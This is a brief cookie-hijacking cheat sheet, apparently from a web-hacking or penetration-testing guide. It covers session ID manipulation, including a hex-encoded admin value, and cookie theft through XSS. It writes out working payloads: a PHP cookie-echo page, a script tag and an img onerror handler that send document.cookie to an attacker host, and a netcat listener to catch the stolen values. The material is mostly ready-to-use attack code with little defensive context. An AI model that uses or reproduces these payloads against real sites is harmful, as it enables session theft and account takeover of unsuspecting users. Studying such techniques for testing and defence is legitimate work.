Cookie Hijacking

A methodology of manipulating, grabbing cookies.

- [WebHacking101](https://github.com/R0B1NL1N/WebHacking101/blob/master/xss-reflected-steal-cookie.md)

Cookie Manipulation

Cookie: PHPSESSID=0
Cookie: PHPSESSID=1
Cookie: PHPSESSID=999

<!-- ASCII Hex -->
Cookie: PHPSESSID=3836382d61646d696e

PHP Cookie Grabbing with XSS

In your local machine, create the payload for grabbing the cookie when the other user will access your machine.

// steal_cookie.php

<?php echo $_GET['cookie']; ?>

Create the JavaScript code to force users to access your machine which shows the victim's cookie value.

<script>document.location = 'http://<attacker-ip>:4444/steal_cookie.php?cookie='+document.cookie</script>

POST request with this JavaScript code to the target web page.
Open listner in your local machine and wait for the other users will access the target web page.

nc -lvnp 4444

Python Cookie Stealer with XSS

This script is useful to steal Cookie.
To start web server, execute the Python script as below.

python2 XSS-cookie-stealer.py

Then inject our XSS to steal Cookie via our web server.
For instance,

<img src=x onerror=this.src='http://10.0.0.1:8888/?'+document.cookie;>